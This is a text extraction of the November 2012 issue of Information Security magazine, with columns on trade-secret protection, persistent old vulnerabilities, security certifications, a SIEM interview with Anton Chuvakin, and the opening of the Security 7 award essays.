INFORMATION SECURITY - Bitpipedocs.media.bitpipe.com/io_10x/io_103284/item_495004/November ISM_finalV2.pdfgreatest threat to the security of the intellectual property. According to

NOVEMBER 2012 • VOLUME 14 • NO. 9

®

I N F O R M A T I O N

SECURITY

SPECIALISSUE: THE

SECURITY 7AWARDS

FOR 2012Seven Outstanding

Security Practitioners Offer Words of

Wisdom

METASPLOIT: SECURITY SALVATION OR SABOTAGE?

CLOUD SECURITY: TACKLING COMPLIANCE

From our SponSorS

www.rsaconference.com/techtarget

Harness Information. Find Connections. Secure Your Data.

Register Now!

As data continues to grow exponentially, the need to manage and protect this information becomes more imperative. RSA® Conference equips you with the tools you need to get ahead of threats to your organization, infrastructure and assets. Over �ve days, you will explore ways to overcome top security challenges, discover the latest technological advances and collaborate with fellow infosec professionals and experts.

5 days of learning and discovery

350+ innovative exhibitors

220+ illuminating sessions

18 essential tracks

NEW! 30- and 60-minute sessions

NEW! Expanded expo area

Save $700 before Friday, November 16, 2012

Harness Information. Find Connections. Secure Your Data.As data continues to grow exponentially, the need to manage and protect this information becomes more

GlobalDiamondSponsors

GlobalPlatinumSponsors

GlobalGold

Sponsors

PlatinumSponsors

GoldSponsors

SilverSponsors

Closing Keynote SpeakerClosing Keynote Speaker

Condoleezza Rice66th Secretary of Stateof the United States

Security inKnowledgeMastering data. Securing the world.

4INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

INFORMATION SECURITY PROS arguably have the hardest job in IT. Not only do they have to keep up with rapidly changing technology trends, but also the relentless pace of new threats. They defend their organizations against adversaries that are often organized with more funds and resources at their disposal.

In many organizations, security pros have to fight hard to be heard by the C-suite and win funding for security projects. When they do get the spotlight, it’s usually because something bad has happened—the company’s network has been hacked or it suffered some type of data loss. Good grief, who would want this job?

Fortunately, the information security field is filled with strong, talented and dedicated people who are up to the challenge. Each year, we honor seven of them with our Security 7 Award. This is the eighth year we’ve handed out the award, which recognizes outstanding information security professionals in seven vertical markets. Some of the industry leaders and luminaries we’ve hon-ored include Gene Spafford, Dorothy Denning, Dave Dittrich, Mark Weather-ford, Melissa Hathaway and Chris Hoff.

This year, we’re pleased to add to our Security 7 honor roll Wade Baker of Verizon, Krishnan Chellakarai of Genentech/Roche Pharma, Doug Powell of British Columbia Hydro & Power Authority, David Seidl of Notre Dame, John Streufert of the Department of Homeland Security’s National Cyber Security Division and Preston Wood of Zions Bancorporation.

These winners represent diverse interests, from emerging critical infra-

Security Stars of 2012The Security 7 Award honors outstanding individuals in an industry filled with dedicated professionals. BY MARCIA SAVAGE

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

5INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

structure protection issues and protecting federal networks, to information sharing and big data security analytics. While they have different focuses, all share a tireless devotion to cybersecurity.

We’re continuing our five-year tradition of having our Security 7 winners write an essay on an information security topic they feel deeply about. The idea is that you get to hear from security leaders in their own words, unfiltered. Each year, we learn a lot from what the winners have to say, and I think you’ll find their essays valuable too.

Our seventh award goes to Ron Knode of CSC, who sadly passed away in May. If you didn’t know Ron Knode, you should read Jim Reavis’ essay on the man, his achievements and his character. As Reavis—executive director of the Cloud Security Alliance—describes him, Ron was a true security warrior. He was multi-talented with an indefatigable dedication to advancing cybersecu-rity. Ron’s most recent contributions were in the area of cloud security; he led the charge in demanding transparency around cloud provider security con-trols. His passing is a tremendous loss to the industry. Ron’s passion and en-ergy—like that of our other Security 7 winners—is truly inspiring.

I’ve covered the security industry for the past 12 years, and have been im-pressed by all the super-smart and enthusiastic people I’ve met. Information security pros have a job that is oftentimes thankless, but they are driven regard-less. I’m moving on from Information Security magazine and TechTarget but am grateful for the experience of reporting about such a dynamic industry filled with so many incredible people. n

MARCIA SAVAGE is editor of Information Security magazine. Send comments on this column to [email protected].

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

6INFORMATION SECURITY n NOVEMBER 2012

PERSPECTIVES

THE CONFIDENTIAL INFORMATION and trade secrets of U.S. corpo-rations will be stolen, the only questions are when, and how much damage will the theft cause? Indeed, Congress has heard this year from a slew of witnesses who have testified about the threat posed by foreign hackers who penetrate U.S. companies’

computers and steal valuable data and intellectual property. FBI Director Rob-ert Mueller testified that hacking could soon replace terrorism as the FBI’s pri-mary concern. Gen. Keith Alexander, head of the military’s Cyber Command, characterized the losses caused by cybertheft as the “greatest transfer of wealth in history.”

At the same time, however, employees and other insiders, who by virtue of their position have access to companies’ confidential information, remain the greatest threat to the security of the intellectual property. According to a study I conducted of the 120 prosecutions the government has brought for theft of trade secrets, in more than 90 percent of the prosecutions, the defendant was an “insider” and had access to the trade secrets because he or she either was an employee of the victim, or worked for a vendor or contractor of the victim.

Companies should also be aware that defendants almost always misappro-priate trade secrets shortly before resigning from the victim company. In addi-tion, most information is obtained by downloading from the companies’ com-puter system.

The threats to confidential data are even greater for companies that operate overseas, especially in countries that don’t enforce the protection of intellectual

Keeping Trade Secrets SecretEnterprises need to implement best practices to protect their confidential data. BY PETER J. TOREN

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

7INFORMATION SECURITY n NOVEMBER 2012

PERSPECTIVES

property rights to the same extent as the United States. It is critical, therefore, that U.S. companies operating worldwide adopt a set of best practices for pro-tecting intellectual property that not only applies to their U.S. employees, but to their foreign offices as well.

There are a number of best practices that a company, whether operating do-mestically or internationally should adopt:

1.Employees and vendors must be required to sign a code of conduct and confiden-tiality, and non-disclosure agreements before beginning work. It is critically im-portant to create not only legal obligations for employees to safeguard the company’s confidential information, but also to impress upon them the im-portance of doing so. Employees should be reminded of their obligation to maintain the secrecy of the company’s proprietary information through reg-ular training and audits.

2.Electronically stored confidential information should be compartmentalized and accessible only on a need-to-know basis. There is simply no reason for employ-ees who, for example, are not working on a particular project to have access to confidential information relating to the project or for employees who are working on a section of the project to have access to all of the project’s intel-lectual property.

3.Immediately revoke a departing employee’s ability to access any proprietary information.

4.Conduct an exit interview with the employee and require him or her to attest that he or she is not taking any confidential or proprietary information to a new em-ployer. It is absolutely critical for a company to learn the departing employ-ee’s future plans and, more specifically, if the departing employee intends to join a competitor or start his or her own company.

5.If suspicious activity on the part of the departing employee is uncovered, consider conducting a full-scale investigation of the former employee’s recent conduct. This should include, for example, a forensic analysis of the employee’s electronic devices, including any company-issued computer laptops.

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

8INFORMATION SECURITY n NOVEMBER 2012

PERSPECTIVES

It is especially important that U.S. companies operating internationally un-derstand that regardless of the steps undertaken to protect their confidential information, the protection is only as strong as the weakest link; companies must continuously evaluate the situation and implement new protections as the situation warrants. At a minimum, companies, regardless of where they do business, should implement the following additional measures:

■n Physical security measures should include carefully controlled access to fa-cilities containing valuable proprietary and confidential information.

■n Network and computer security should at a minimum include passwords and firewalls to prevent infiltration by hackers and other outside threats.

■n Implementation of a policy that controls the classification and marking of proprietary documents, and access to documents and their physical handling.

■n Training of new hires and current employees, regardless of nationality, as well as security audits to promote compliance with the program’s policies.

Even with best practices for protecting intellectual property, companies are still vulnerable to having their confidential information and trade secrets mis-appropriated. Accordingly, it is crucial that companies not only continuously re-evaluate their practices, but also consult with security and legal experts in each country that they do business to make sure it’s not running afoul of any laws and is protecting its valuable information in a manner that preserves all available legal protections. The review should emphasize internal threats and the danger of foreign economic espionage, especially to high-tech companies. n

PETER J. TOREN is a partner with Weisbrod, Matteis & Copley in Washington, D.C. He was also federal prosecutor with the Computer Crime & Intellectual Property Section of the Justice Department and is the author of Intellectual Property & Computer Crimes. Send comments on this column to [email protected].

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

9INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

SCAN: SECURITY COMMENTARY, ANALYSIS AND NEWS

Blast from the PastOld-school vulnerabilities and configuration blunders continue to plague organizations, experts say. BY ROBERT WESTERVELT

OLDER APPLICATION VULNERABILITIES and long-standing configura-tion weaknesses are repeatedly haunting organizations, ac-cording to penetration testers and security experts, who say the issues are either being ignored or are long forgotten.

Systems configured with open ports for remote access, easily discoverable application vulnerabilities and holes in rarely used server components are just a few of the attack vectors that are coveted by penetration testers to gain access into corporate networks. The common issues are well known by white hat hackers and cybercriminals alike, and often lead to embar-rassing, high-profile data breaches, says H.D. Moore, CTO of Rapid7 and cre-ator of the Metasploit penetration testing platform.

“If you look at how far we’ve come over the last 25 to 30 years of doing Inter-net security, we’re still using unencrypted management protocols for the most part,” Moore says.

Since May, Moore has been probing the Internet, scanning for transmission control protocol (TCP) and user datagram protocol (UDP) services, the Inter-net communication protocols used by a wide variety of devices, applications and servers. During his probe, he found that Port 8080, an alternative communica-tions channel used by Web services, had a lot of application framework admin interfaces and device admin interfaces exposed to the Internet. Proxy gateways, admin interfaces for embedded devices and a lot of network-attached storage (NAS) admin interfaces were all exposed, says Moore, who spoke about the is-sues he identified at the recent DerbyCon security conference in Louisville, Ky.

10INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

SCAN: SECURITY COMMENTARY, ANALYSIS AND NEWS

“When new vulnerabilities come out, it’s very fun to watch a small subset of the population patch immediately, and then you see a small section of the populous never patching at all,” Moore says.

Moore discovered over 1,000 clear text passwords exposed to the Internet—passwords that enable anyone to access secure shell servers, databases and re-tail applications. More than 1.5 million MySQL database management systems were exposed to brute-force password attacks or had default passwords, ripe for any attacker. In all, over 43 million devices were detected that exposed the popular simple network management protocol (SNMP), which provided easy access to routers, addresses and listening ports.

“It’s amazing that something as easy as SNMP, which a lot of vendors will en-able on an otherwise totally locked down, patched system, will expose clear text passwords to other servers because you don’t have the services configured prop-erly and no one ever took that into ac-count,” Moore says.

Misconfigured VPNs, poorly deployed encryption, and weak and mishandled passwords can be found at just about any firm, says Jamie Gamble, a senior se-curity consultant at Denver-based security firm Accuvant Labs, who spoke at the SecTor security conference in Toronto, where he discussed the vulnerabili-ties he commonly exploits during tests with his clients. Gamble, who focuses his time and research into Unix systems, says companies often neglect them because they consider Windows errors a bigger threat.

“I’m using many of the same ways [exploits] that were used in the 1990s,” Gamble says. “Some of the early papers on exploitation can still easily be ap-plied in today’s environments.”

Unix-based systems that provide network authentication could have been configured years ago and easily left with settings that expose a list of user di-rectory passwords to an attacker, Gamble says. Lightweight Directory Access Protocol (LDAP) passwords can often be pulled from regions of memory in a rooted Solaris machine. Even shell password files can be easily cracked.

Network switches are often susceptible to man-in-the-middle attacks.

More than 1.5 million MySQL database management systems were exposed to brute- force password attacks or had default passwords, ripe for any attacker.

11INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

SCAN: SECURITY COMMENTARY, ANALYSIS AND NEWS

Network auditing and pen testing sniffer tools have automated the process of carrying out a man-in-the-middle attack, Gamble says.

“This stuff has been made to be so easy that anyone can do it,” Gamble says. “We now have the automated tools to attack networks with fundamental flaws.”

Grayson Lenik, a security consultant at Chicago-based security firm Trust-wave, says he often sees e-commerce companies compromised and thousands of credit cards stolen because of a simple coding error that is vulnerable to a SQL injection attack. Remote file inclusion and directory traversal, both old-style attacks, are also very common, Lenik says. A crafty SQL injection attack, combined with other exploits, can pull out large sums of data, helping cyber-criminals get past firewalls, pull up a shell and execute code on a remote server.

“Back-end databases have gotten much more powerful and storage is cheaper, but SQL injection is one thing that hasn’t changed,” Lenik says. “We figured out how to stop much of this in 2000, but I still see it regularly.” n

ROBERT WESTERVELT is news director of TechTarget’s Security Media Group and SearchSecurity.com. Send comments on this article to [email protected]

12INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Beyond CertificationsEducating the security professional requires far more than a certification exam. BY DOUG JACOBSON AND JULIE A. RURSCH

EDUCATION

ONE OF THE most frequently asked questions we get from stu-dents, both prospective and enrolled, is, “What type of se-curity certifications are necessary to be competitive in the field of security?” Although it seems like a simple, valid question that we should have a snap answer for, we believe

the students are missing the true question that should be asked: “What value do certifications provide in a security professional’s career?” We also believe that some security professionals can fall prey to the same trap of assuming there are certifications that are the Holy Grail. They, like our students, need to under-stand what that certification represents and what it doesn’t. They need to un-derstand both the value and shortcomings of certifications.

In some ways, security professionals have the same demands as other em-ployees in any business, government or educational setting. Technology is rap-idly and constantly changing, and all employees need to stay current with the latest tools and techniques in their area of expertise to stay at the top of their game. We can represent this continual technology change along an X-axis that extends to infinity. However, unlike most scientists and engineers, for which the only moving target is ever-changing technology, security professionals in-cur change along a second Y-axis that represents the growing number of secu-rity threats and attack avenues. The rapid movement along both vectors pro-vides security professionals with a constantly changing landscape and, at times, one that is almost impossible to keep pace.

The same axiom we use when recruiting prospective students to study

13INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

EDUCATION

security is also the crux of our problem with certifications: The most exciting thing about security is that unlike most science/engineering disciplines, where the laws of physics and nature don’t change, the knowledge in our discipline has constant and rapid change. Here lies both the glory and the curse of the se-curity profession. The joy of our work constantly changing means we also have the necessary need to continually update our skills and knowledge. Addition-ally, while many scientists and engineers are looking at challenges presented by nature, in security, our challenges are presented by people. These people can be thought of as adversarial and highly motivated. They also only have to find one weakness in a system to gain the upper hand, while we in security have to find all the holes and plug them. So, when we think of security education in practice, we as security professionals do not have a static route to our career; it’s dynamic. So, how do certificates fit into this? Cer-tificates should be viewed as not an end, but as a measurement of mastery along the pathway of a profession in security. While many educators talk about instill-ing in students the ability for life-long learning, we can’t just talk the talk—we need to walk the walk. Our students can’t depend upon rote memorization and passing a certification. They need to learn and think independently. Profes-sional development in security is more about continuing education and keep-ing skills and knowledge current than earning a bunch of letters behind your name.

While this sounds like a denunciation of certifications, it’s not. Certifica-tions have their place. For some individuals, working toward a certification gives them the motivation to learn about something new with the completion of the test helping them visually demonstrate their learning. Certifications can also be used for measurement in jobs which, in some cases, allow employees to earn more money for their effort to update their skill sets. In addition to earning employees a bump on the pay scale, some jobs require certifications, such as those for law enforcement or expert witnesses. Typically, these certifi-cations require renewals at a predetermined time period, which generally in-cludes continuing education work, practice and a test to keep them.

Certificates should be viewed as not an end, but as a measurement of mastery along the pathway of a profession in security.

14INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

EDUCATION

Over the years, on and off, universities get pressured to teach to a certifica-tion. Most security educators believe, as we do, that our place is to provide the basic knowledge that will enable students to continue to learn over their career lifetime. Life-long learning in security requires that students have the ability to move along both vectors in the changing graph of security.

So back to the original question, “Which certification should I get?” The an-swer should be whichever certification will help you continue to learn and stay on top of what is happening in security. Remember that certifications are noth-ing more than a milestone along a successful security career path: They repre-sent the path that has been successfully completed. They do not represent the end of the journey, but rather the vastness of the road to travel. n

DOUG JACOBSON is a professor in the department of electrical and computer engineering at Iowa State University and director of the Information Assurance Center, which was one of the original seven NSA-certified centers of academic excellence in information assurance education.

JULIE A. RURSCH is a lecturer in the department of electrical and computer engineering at Iowa State University and director of the Iowa State University Information Systems Security Laboratory, which provides security training, testing, and outreach to support business and industry. Send comments on this column to [email protected].

15INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Q&A WITH RANUM

A Chat With Marcus Ranum Security expert and Information Security magazine columnist goes one-on-one with Anton Chuvakin, a research director in the Gartner for Technical Professionals (GTP) Security and Risk Management Strategies team.

RANUM I’ve been thinking lately that it’s about time for a next-generation SIEM [se-curity information and event management] to come along and overturn the current state of the art. I thought, perhaps, we might fantasize a little bit—while remaining practical—about what such a thing might look like. Avoiding the big data hype, I have to admit that my blood runs cold when I hear marketing people talk about petabytes of data, when we’re barely managing to turn gigabytes of data into megabytes of use-ful information. It’s definitely the case that our current SIEM solutions are going to be constantly pressured to do more with less, which—in a SIEM context—means reduce data so it’s even more significant.

Short of artificial intelligence, where do you think we’re going to have to take next-generation SIEM systems in order to produce less data that is more significant, while absorbing even more raw input?

CHUVAKIN As you know, my day job includes exactly that kind of thinking. Re-cently, I wrote a report called SIEM Futures, where I outlined five futures that SIEM has to conquer to become a next-generation system. While you should read the report to see full details, I can outline some of the ideas here. Also, none of these would be completely unheard of because in many cases the fu-ture is already here, it’s just unevenly distributed. So, the SIEM of the near future will include expanded context data collection and analysis, distributed intelligence features, the ability to monitor “emerging” IT environments (such as virtual and cloud environments), new and expanded algorithms for histori-cal and real-time analysis, and will be much more useful than today’s SIEM for

16INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Q&A WITH RANUM

application security monitoring.In essence, I’m looking not only at newer and better analysis algorithms—

primarily on stored, but also on stream, data—but also at expanded informa-tion collection (especially context information that goes beyond resolving user-names into identities and vulnerabilities on assets), as well as being able to operate in newer environments such as hypervisors and deep inside applica-tions, where an IP address means nothing and logs are even more esoteric. These methods and futures can cross-pollinate; for example, new algorithms applied to application log data analysis or shared intelligence about attacks on public clouds.

Despite all those exciting futures, many of today’s environments are still about firewall logs and Unix syslog, so don’t get too excited about the future. I’d venture a guess that for every organization that uses Hadoop, there are doz-ens that still use Windows 2000, and, less likely but still possible, Windows NT 4.0. Regarding the petabytes of data, I’m just as miffed as you are as I see environments where available kilobytes of data are ignored (see the latest Ve-rizon Data Breach Investigations Report for examples). Giving these organiza-tions megabytes, gigabytes, up to petabytes will not change how these people approach security information and utilize SIEM.

RANUM It seems to me that visualization and workflow automation are going to be crucial, yet I am blissfully unaware of really good ways of presenting the kind of in-formation we’ll need to produce from a next generation SIEM. There will need to be at least some kind of sharing model built in, so that some self-generated clustering rules are automatically shared within communities of interest, and perhaps there’s a like/don’t like crowdscoring system for globally promoting analytic rules. That’s my day-dream; how does that match your SIEM nirvana?

CHUVAKIN A long time ago I wrote a blog post on “ideal” SIEM systems. I looked back at it, and I saw some naïve things but also some things that are still true today. Here are some:

■n Logging configuration: The ideal SIEM will find all possible log sources (sys-tems, devices, applications, etc.) and enable the right kind of logging on them according to a high-level policy given to it.

17INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Q&A WITH RANUM

■n Log collection: Will collect all the above logs securely without using any risky super-user access and with little to no impact to networks and systems.

■n Log storage: It can securely store the above logs in the original format for as long as needed and in a manner allowing quick access to them, in both raw and summa-rized/enriched form.

■n Log analysis: This ideal SIEM will be able to look at all kinds of logs, known to it and previously unseen, from standard and custom log sources, and tell users what they need to know about their environment based on their needs: What is broken? What is hacked? Where? What is in violation of regulations/policies? What will break soon? Who is doing this stuff? The analysis will power all of the following: automated actions, real-time notifications, long-term his-torical analysis and compliance relevance analysis (this probably requires some form of artificial intelligence).

■n Information presentation: Will distill the above data, information and con-clusions generated by the analytic components, and present them in a manner consistent with the user’s role, from operator, to analyst, to engineer, to ex-ecutive. Interactive visual and drillable text-based data presentation across all log sources. The users can also customize the data presentation based on their wishes and job needs, as well as information perception styles.

■n Automation: The ideal log management tool will be able to take limited au-tomated actions to resolve discovered and confirmed issues as well as generate guidance to users so they know what actions to take when full-auto mode is not appropriate. The responses will range from full-auto actions, to assisted actions (i.e., click here to fix it), to issuing detailed remediation guidance. The output will include a to-do list of discovered items, complete with suggested actions and ordered by priority.

However, let me take this conversation in a somewhat different direc-tion. Most of the successful SIEM projects I’ve seen aren’t successful because they have ideal technology. Similarly, most of the failed projects have failed

ANTON CHUVAKIN

18INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Q&A WITH RANUM

not because they have crappy SIEM technology. Success or failure of a SIEM project simply depends more heavily on processes and practices, not the tools themselves. As we know, security monitoring can never be automated and at-tempts to create an ideal tool that will automate it are doomed to fail.

Essentially, some people who buy SIEM boxes don’t use them and then whine that “the product does not do enough.” It is one step above complain-ing that one’s copy of Microsoft Word keeps failing to write the next great American novel. Or that one’s state of the art DSLR fails to turn one into Ansel Adams.

RANUM “Relevance analysis” sounds good! It reminds me of our quest for “correla-tion” in system logging. The industry seems to have done a pretty good job of providing linkages between pieces of information, but they seem to mostly be rule-based (i.e., if more than 70 percent of the terms in two events are shared, and they appear within 60 seconds of each other, group them into a cluster.) But as a community we seem to have done a pretty poor job of taking advantage of the pattern-recognition research in AI. I’ve always been disappointed that the security industry seems to be playing it safe and building what we know will work (rule-based systems) instead of shooting for “intelligence amplifying” systems. By that, I mean systems that make hypothesis by generating fuzzy rules, then ask their human operators, “Is this useful?” And then remember and apply the results. Is there anyone doing research in advanced analytics that excites you?

CHUVAKIN A lot of academic research I’ve seen that purports to do that is really quite dumb and not even loosely connected to operational security reality. I’m pretty sure examples of excellent academic research in security data analysis exist; it’s just that my nearly 10-year quest for it came up with essentially noth-ing. For crying out loud, those academics still use 1998 data sets in 2012. As far as this research is concerned, most SIEM vendors are experimenting with pro-filing and baselining techniques—essentially old-school anomaly detection. If you were able to do it creatively, use it on log data and produce useful insights.

In general, I want more people to use data mining and text mining—on un-parsed logs—for log analysis, and I’ve seen many examples of that almost work-ing in the field. However, nobody has productized it well yet.

RANUM I like your suggestion of the logging system being able to do discovery. It

19INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

Q&A WITH RANUM

seems to me that a big piece of our log management problem is going to get solved as the “systems challenged” customers move their data to cloud providers where logging and configuration management doctrines are in force. Pushing this stuff into the cloud at least makes massive log aggregation (and cross-customer analysis) a possibility. What do you think the impact of the cloud is going to be?

CHUVAKIN More people actually pull data from the cloud into their traditional on-premise SIEM tools than shove the data up to the cloud from their on-prem-ise log sources. There was another research project I did on security monitor-ing for public cloud assets and that was one of the key discoveries—and key surprises. It seems like cloud systems will serve as a log source for some time before we learn how to use public cloud resources for data analysis.

This being said, there are a couple of interesting vendors that do log manage-ment using a Software as a Service model, aka “log management in the cloud.” These guys seem to be utilizing the advantages of having all their customers’ data in one massive system with essentially unlimited computing power. New analytics do become possible, but I’ll reserve my judgment until I see more examples of that working as well or better than traditional SIEM in today’s environments.

RANUM What direction do you see logging going in that excites you?

CHUVAKIN You know, I’m still excited about log standards, such as common event expression. I feel that unless we get much better analyzing unstructured data—essentially text mining and natural language processing, even though most logs remind me of broken English and not natural language—the stan-dard just has to happen. Also, just about any new analytic technique that actu-ally works on production data—not on stupid fake academic data sets—and on production data volumes, excites me as well.

So I’m feeling hopeful about the standards, despite the long odds and de-spite you being skeptical about them. I’m also feeling hopeful about increased adoption of tools that analyze and don’t just store data and about people actu-ally using them. By the way, these tools don’t have to be based on Hadoop to be fun, they might well use MySQL or something.

RANUM Anton, thank you so much for your time. It’s always a pleasure. n

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

THE SECURITY 7 AWARDS Recognizing the industry’s best security professionals in 2012 TELECOMMUNICATIONSWade Baker

HEALTH CARE Krishnan Chellakarai

IN MEMORIAM Ron Knode

ENERGY & UTILITYDoug Powell

EDUCATIONDavid Seidl

GOVERNMENT John Streufert

FINANCIAL SERVICES Preston Wood

COVER STORY

INFORMATION SECURITY n NOVEMBER 2012 20

21INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: TELECOMMUNICATIONS

Dogma to DataThe information security field needs to overcome information sharing roadblocks to improve decision making. BY WADE BAKER

AS A STUDENT of information technology as well as security and management science, I often find myself looking at security issues through a “decision-ori-ented” lens. For the most part, these two disciplines make good bedfellows, es-pecially when one considers that engineers dominate the information security field. Please don’t misinterpret this; I have a healthy respect for, and advocate our need for engineers (I’ve even helped teach and graduate some of them). However, not all of our problems are engineering problems, and I do believe our ability to truly manage information risk is hindered by a shortage of input from other disciplines. Although I’ve seen some improvement in this area in recent years, it hasn’t been enough.

One area where the engineering and management mindset clash is in deci-sion making. The engineer asks, “What do I need to know to precisely formu-late all factors in this decision?” Meanwhile, the management scientist asks, “What do I need to know to make a good (or at least better) decision?” In such matters, I side heavily with the management scientist.

WADEBAKERDirector

of Security Research and Intelligence,

Verizon

H Primary analyst and author of Verizon’s annual Data Breach Investigations Report, which is widely cited in the information security industry.

H Develops and publishes Verizon’s VERIS framework, part of an international effort to standardize security incident tracking and categorization for improved data collection, reporting, analysis and decision making.

H Baker’s research for the president’s Information Technology Advisory Committee was featured in the group’s 2005 report, Cyber Security: A Crisis of Prioritization.

22INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

2012 SECURITY 7 AWARDS: TELECOMMUNICATIONS

The obvious application of this is in evaluating potential security initiatives and information security decisions: “Should we do X, Y or Z?” In most cases, it’s impossible to precisely formulate all factors in the decision, so we tend to abandon the “scientific” route and revert to other less rigorous methods of making it. This is typically some form or mixture of compliance mandate (“We have no choice but to do X”), fear response (“We can’t allow some horrible thing, so let’s do Y”), or peer following (“Everyone else is doing Z, so we should too.”) And this is where our predominantly engineering mindset hurts us. In-stead, we should realize that organizations have always made decisions using varying amounts of information of varying quality. Our dilemma is not new. Valid and vetted approaches—or models—exist for structured decisions with an abundance of precise data and also for unstructured problems with sparse amounts of “fuzzy” data. These models are out there and are eagerly waiting for us to apply them to problems in our domain.

But I’m not going to spend the rest of my allotted space discussing models. I started my career in information security as a modeler, but I’ve become much more of a muddler over time. Rather than trying to impose existing models or beliefs on a security problem, I’ve become much more interested in explor-ing data to see what it might have to say about those models and beliefs. On the downside, the message is often not as loud and clear as I’d like it to be—at least in the short term—but the upside is that the bits I do manage to discern are truer than my preconceptions. With enough data to muddle through, our measurements, models, beliefs and ultimately, our decisions, will be greatly improved.

That is why I like data and pursue every little bit (pardon the pun) I can get my hands on. I think it holds more promise for the future of this industry than dogma. A lack of appropriate (or appropriately used) models is certainly a chal-lenge to security decision making, but lack of data is a more fundamental and critical one. Whether we’re a nation, organization or individual, we do not have data of sufficient quality or quantity to create and test models, make informed decisions or take justified action to manage information risk.

Many in our field recognize this and increasingly espouse information shar-ing as the remedy for our data disease. I won’t disagree with that prescription: We have precious little information on our own, but together we could con-struct a much more complete and accurate picture of the risk landscape. The problem with data sharing, however, is that it does not happen automatically.

23INFORMATION SECURITY n NOVEMBER 2012

EDITOR’S DESK

PERSPECTIVES

SCAN

EDUCATION

RANUM

SECURITY 7: SECURITY

STANDOUTS OF 2012

METASPLOIT: SECURITY SALVATION

OR SABOTAGE?

CLOUD SECURITY: TACKLING

COMPLIANCE

